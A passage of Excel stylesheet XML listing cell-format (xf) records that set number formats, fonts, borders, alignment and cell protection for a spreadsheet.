      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="43" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="1" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="48" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="48" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="48" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="43" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="180" fontId="2" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="37" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="35" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="48" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="1" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1"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176" fontId="12" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="27" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="43" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="2" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="18" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="22" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="43" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="38" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="0" xfId="38" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="16" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="1" xfId="8" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="2" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="3" fillId="0" borderId="0" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="1" xfId="8" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="8" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="2" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="42" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="1" xfId="11" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="16" fillId="0" borderId="1" xfId="11" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="38" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="2" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="180" fontId="3" fillId="0" borderId="0" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="3" fillId="0" borderId="0" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="0" xfId="38" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="38" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="43" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0" xfId="29" applyFill="1"/>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0" xfId="29" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="29" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="29" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="0" borderId="0" xfId="29" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" xfId="29" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0" xfId="29" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
